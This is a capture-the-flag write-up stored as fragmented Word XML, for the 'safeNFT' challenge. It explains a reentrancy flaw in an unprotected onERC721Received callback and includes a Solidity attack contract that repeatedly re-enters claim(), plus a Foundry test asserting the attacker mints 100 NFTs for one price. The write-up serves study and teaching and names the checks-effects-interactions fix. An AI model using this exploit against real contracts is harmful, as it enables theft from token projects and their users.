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4CDF0E" w14:paraId="2C078E63" wp14:textId="32D4C7FF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF0E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF0E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>safeNFT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="68373184" w14:textId="217A0090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</w:pPr>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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Description of the vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="323AF1BA" w14:textId="5B557358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1. Unprotected callback, if a function performs a callback to the recipient for token to check if they are willing to accept the token or not then it may lead to state changing events in the caller </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_IW40b0tV" w:id="1136804716"/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contract by the recipient</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1136804716"/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 In</w:t>
      </w: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safeNF</w:t>
      </w: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</w:t>
      </w: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contract any recipient contract got a</w:t>
      </w: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bookmarkStart w:name="_Int_IeEAxpYU" w:id="25526582"/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callbac</w:t>
      </w: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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25526582"/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to check </w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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onERC721Receiver </w:t>
      </w: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function implemented or not. If implemented the recipient can write whatever logic he wants, including calling a claim function to reenter</w:t>
      </w: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again and agai</w:t>
      </w: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</w:t>
      </w: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which leads to reentrancy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4EE5C5C0" w14:textId="21197DDD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2.In the claim function if the developer follows the</w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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check, effect</w:t>
      </w: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and </w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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interaction </w:t>
      </w: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pattern can easily </w:t>
      </w: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eliminat</w:t>
      </w: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</w:t>
      </w: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reentrancy</w:t>
      </w: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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="699B129A" w14:textId="2D96A83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</w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="39EA5798" w14:textId="6B8A0C30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</w:pPr>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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Attack step:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="684A9154" w14:textId="61027380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1.buy </w:t>
      </w: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()   </w:t>
      </w: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                            //attack contract function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6FA5B4F4" w14:textId="5A7A65DD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Calls </w:t>
      </w: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buyNFT</w:t>
      </w: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()   </w:t>
      </w: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            //target contract function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="06E5C37C" w14:textId="568AB0AF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2.claimNFT </w:t>
      </w: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()  </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_HCNVdk7K" w:id="2072537391"/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bookmarkEnd w:id="2072537391"/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                  //attack contract function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="21AC9717" w14:textId="74D11BA1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Calls claim </w:t>
      </w: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()   </w:t>
      </w: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               //</w:t>
      </w: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target</w:t>
      </w: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contract function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="23B0D3FB" w14:textId="065385EE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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4652C044" w14:textId="3F7089E9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</w:pPr>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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Proof of concept:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="19866545" w14:textId="34DEC51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Challege4Attack.sol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="44D5FB58" w14:textId="481D3124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SPDX-License-Identifier: UNLICENSED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="723E3308" w14:textId="5C27C119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pragma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solidity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0.8.7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="059D5AD6" w14:textId="6BEFB4A9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/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="7C9067D9" w14:textId="7B0B00F1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@title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Attack contract for challenge4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="281E09A1" w14:textId="39095C5F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@author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PULAMARASETTI NAVEEN(Purple_Calender)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="7D88660C" w14:textId="03FD98DB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@notice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minting multiple NFTs for one NFT price</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="3EB096F6" w14:textId="68378A2E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@dev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loophole is unprotected callback to the recepient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="514BDA3F" w14:textId="0D1D402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 @</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_9T2A3Wfu" w:id="4301122"/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custom:experimental</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4301122"/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this contract only for experimental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puprose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6F0B015C" w14:textId="7FAA9831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*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="12B85C3F" w14:textId="1A4BDE86">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6D7B43AC" w14:textId="3D2E2727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interface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ISafeMint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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6E356DAC" w14:textId="3729224A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totalSupply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external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view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returns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uint256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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="75A00D92" w14:textId="14B442D4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buyNFT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external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payable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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="5B02A784" w14:textId="61B6A80E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bookmarkStart w:name="_Int_Oy4fILG6" w:id="1972128536"/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claim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bookmarkEnd w:id="1972128536"/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external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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2FCFD349" w14:textId="251574CB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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4636398E" w14:textId="32E25D7F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contract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Attack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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="63276AD6" w14:textId="06EB1E47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///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target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contract address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="67EBF9D9" w14:textId="1C0EF541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address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targetAddr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  <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="14CE1050" w14:textId="28C842D9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bookmarkStart w:name="_Int_BcPo7vjU" w:id="320167143"/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constructor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bookmarkEnd w:id="320167143"/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address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addr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payable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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="777569C4" w14:textId="0B392D3B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targetAddr = addr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="71B473DF" w14:textId="7CAEA5AD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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="676CAC58" w14:textId="16C8CC9F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Buy (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external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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="1FF7F0CD" w14:textId="06C69014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ISafeMint(targetAddr).buyNFT{value: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10000000000000000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wei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}();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="75A3B70F" w14:textId="618C0DB9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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2B44F349" w14:textId="7929C251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</w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2B4CC141" w14:textId="2DE8C9C8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claimNFT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external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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="19EC542D" w14:textId="57B3CE26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ISafeMint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targetAddr</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_SwsRXdL8" w:id="492239075"/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).claim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492239075"/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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="77465E4E" w14:textId="08892E90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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="0286CFFA" w14:textId="3F8A143A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</w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="23CE47A2" w14:textId="286C733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onERC721</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_FbOtIWPw" w:id="2006080536"/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Received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bookmarkEnd w:id="2006080536"/>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4AA9DE2C" w14:textId="65F97FB3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address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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="48FBA4C4" w14:textId="144705C4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address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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="50780079" w14:textId="35C57559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uint256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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="02BB1F89" w14:textId="03D0D67B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bytes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memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="5A1D4403" w14:textId="4D4B748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) </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_GLrsdaT2" w:id="1868352103"/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bookmarkEnd w:id="1868352103"/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returns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bytes4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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2ECC0C90" w14:textId="3A96DED2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(ISafeMint(targetAddr).totalSupply() &lt;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100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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="773A79CE" w14:textId="6CAB6070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ISafeMint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targetAddr</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_gvWkwu4j" w:id="1408661969"/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claim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1408661969"/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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="661C65D0" w14:textId="7E4A991A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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="514A5134" w14:textId="69703C8A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bookmarkStart w:name="_Int_x0aAjLIi" w:id="117993379"/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.onERC721Received.selector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117993379"/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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2F65A5C4" w14:textId="20ED64A3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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="496F0AE1" w14:textId="566DEA07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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="748E435E" w14:textId="06B05A1B">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4F2D90EF" w14:textId="2E7F080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</w:pP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2.challenge4.t.sol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2971D363" w14:textId="35F62A9E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//SPDX-License-Identifier:UNLICENSED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="045749D0" w14:textId="553EE766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pragma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solidity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0.8.7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="699E4644" w14:textId="35020209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"forge-std/Test.sol"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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="13BB74B1" w14:textId="5D472CCB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"forge-std/Vm.sol"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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="22012EE8" w14:textId="354A0905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"src/quillCTF/challenge4.sol"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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2A86197A" w14:textId="37DF9C2F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src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/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quillCTF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/challenge4Attack.sol"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E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="5E23DE40" w14:textId="1F20D80E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contract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TestChallenge4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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2F3E0308" w14:textId="7AF438CE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safeNFT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challenge;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="25CAE8E3" w14:textId="32EEBC65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Attack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attack;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="41EF89DD" w14:textId="7A5A98C9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///setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6EE9858A" w14:textId="5BE0CA32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bookmarkStart w:name="_Int_7cTx3ce4" w:id="7273113"/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constructor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bookmarkEnd w:id="7273113"/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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="7EEBB5A2" w14:textId="78A75A7A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challenge =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safeNFT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"Purple_Calender"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"PC"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10000000000000000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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="773E45D1" w14:textId="36DDAE14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vm.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deal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address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),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3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ether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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="20BE9D14" w14:textId="74F800B0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attack =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bookmarkStart w:name="_Int_UBDyD8HD" w:id="374130204"/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Attack{</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374130204"/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value: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1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bookmarkStart w:name="_Int_5WWfp7XK" w:id="278255213"/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ether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}(</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278255213"/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address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(challenge));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="3C85939E" w14:textId="17B8117C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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="73EDB703" w14:textId="3AB8A63D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</w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="06DC17C8" w14:textId="63780019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///Claiming multiple NFTs for the price of one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="038AE57E" w14:textId="5273B6C8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test_claim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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="132EE4C8" w14:textId="69D56275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attack.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Buy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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="27805B91" w14:textId="17B33F19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attack.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claimNFT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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="6E715601" w14:textId="326607B7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emit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log_named_uint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</w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="1FD85094" w14:textId="243AEF82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"balanceOf attack"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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="0C49EB50" w14:textId="15B045C1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challenge.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balanceOf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address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(attack))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="70EDA89D" w14:textId="63D4A1C5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);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4562936C" w14:textId="51A19D73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assertEq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(challenge.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balanceOf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address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(attack)), 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100</w:t>
      </w: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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="25A677E3" w14:textId="60BA0D23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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="4722BEEF" w14:textId="645536FA">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="exact"/>
      </w:pPr>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="2361C6DE" w14:textId="526A7DA9">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="37DC760B" w14:textId="2185D55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  <w:t>NOTE</w:t>
      </w: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to test it use</w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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forge build –</w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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vv</w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF0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in </w:t>
      </w:r>
      <w:r w:rsidRPr="5E4CDF0E" w:rsidR="5E4CDF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foundary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="3B99B944" w14:textId="1437BCE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</w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="3C83B304" w14:textId="0394347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</w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="759BD858" w14:textId="75E9767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</w:pPr>
    </w:p>
    <w:p w:rsidR="5E4CDF0E" w:rsidP="5E4CDF0E" w:rsidRDefault="5E4CDF0E" w14:paraId="186257FD" w14:textId="616720E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4fozhXTIWqRnw" int2:id="4KHpuVGF">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="TPmXc1R1r9efhx" int2:id="ez7GQQTV">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="L5G5CIDHYqQ0jT" int2:id="jhmazt9L">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="PuxNyftvuw7uNP" int2:id="V8FvWv7T">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="bgtU7cwzMkoSVY" int2:id="D6svgl8r">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="ZtNLleVnd3zw6k" int2:id="az0xgkE6">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="lBbV5P4I+aYPMU" int2:id="pzyoJ5Y2">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="1gvDr2vXBfscmD" int2:id="0xgpPehr">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="C7an2Vudj1VyIF" int2:id="ic7VC6CG">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="IqjTvkslw0LAfg" int2:id="v7ULRgrK">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="8n/t4iILzTJq7j" int2:id="hNn1LG4I">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="kqw7w+IQd5w2mw" int2:id="jZspfF69">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="cpxOBlTnBwmU1y" int2:id="sQR2e63i">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="kuXXMSvNab6PRX" int2:id="f0ATX6KM">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="gdZNNn6l6U8TSe" int2:id="8m6lEf71">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="J9dEBbAUqIQwB8" int2:id="SKJGFrkD">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="j6iDirgzh66GeE" int2:id="bhjFdOZC">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="AJJsQEOPn49mk6" int2:id="HTvFAEOJ">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="IQ3hIpRl6GkLi8" int2:id="AXcv2mw0">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="F/9tQdSvAKwObZ" int2:id="2AqfMmTV">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="K02PrcTxjmtnnc" int2:id="SvemfMhi">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="bIAGma5KId8bx7" int2:id="gK1gxb9D">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="J3Wa7KQgZcEVPU" int2:id="RMH1NIP4">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="8w8dO/ULGWKPpL" int2:id="BoQ6nJj8">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="1p1P0bUiDj2bi/" int2:id="lNgVb4at">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="4yah1FaYGS20Ky" int2:id="Iz6p3e2y">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_5WWfp7XK" int2:invalidationBookmarkName="" int2:hashCode="Ly8xolzf0ElEA/" int2:id="uBntanWf">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_UBDyD8HD" int2:invalidationBookmarkName="" int2:hashCode="35MTqb6bRNAzRF" int2:id="eWzaOHPi">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_7cTx3ce4" int2:invalidationBookmarkName="" int2:hashCode="B4Z1oPZ7HgL9S8" int2:id="W4EA1TBo">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_x0aAjLIi" int2:invalidationBookmarkName="" int2:hashCode="u0Y9YhiGeJMS2r" int2:id="CsFJ0FKl">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_gvWkwu4j" int2:invalidationBookmarkName="" int2:hashCode="9KPFedQrXodTft" int2:id="YcMAPPC6">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_GLrsdaT2" int2:invalidationBookmarkName="" int2:hashCode="YcmysX23eieEG7" int2:id="E53GZ3FM">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_FbOtIWPw" int2:invalidationBookmarkName="" int2:hashCode="PJ83oaC+dovPZU" int2:id="xCfJjKO9">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_SwsRXdL8" int2:invalidationBookmarkName="" int2:hashCode="9KPFedQrXodTft" int2:id="7CnbdauI">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_BcPo7vjU" int2:invalidationBookmarkName="" int2:hashCode="B4Z1oPZ7HgL9S8" int2:id="sXOxdSBZ">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_Oy4fILG6" int2:invalidationBookmarkName="" int2:hashCode="+72Je/sobzI7FY" int2:id="muvw299S">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_9T2A3Wfu" int2:invalidationBookmarkName="" int2:hashCode="nm5FaXDylZ6acW" int2:id="Czb3d57J">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_HCNVdk7K" int2:invalidationBookmarkName="" int2:hashCode="AfDX6W9786L3QZ" int2:id="HFNm7sdy">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
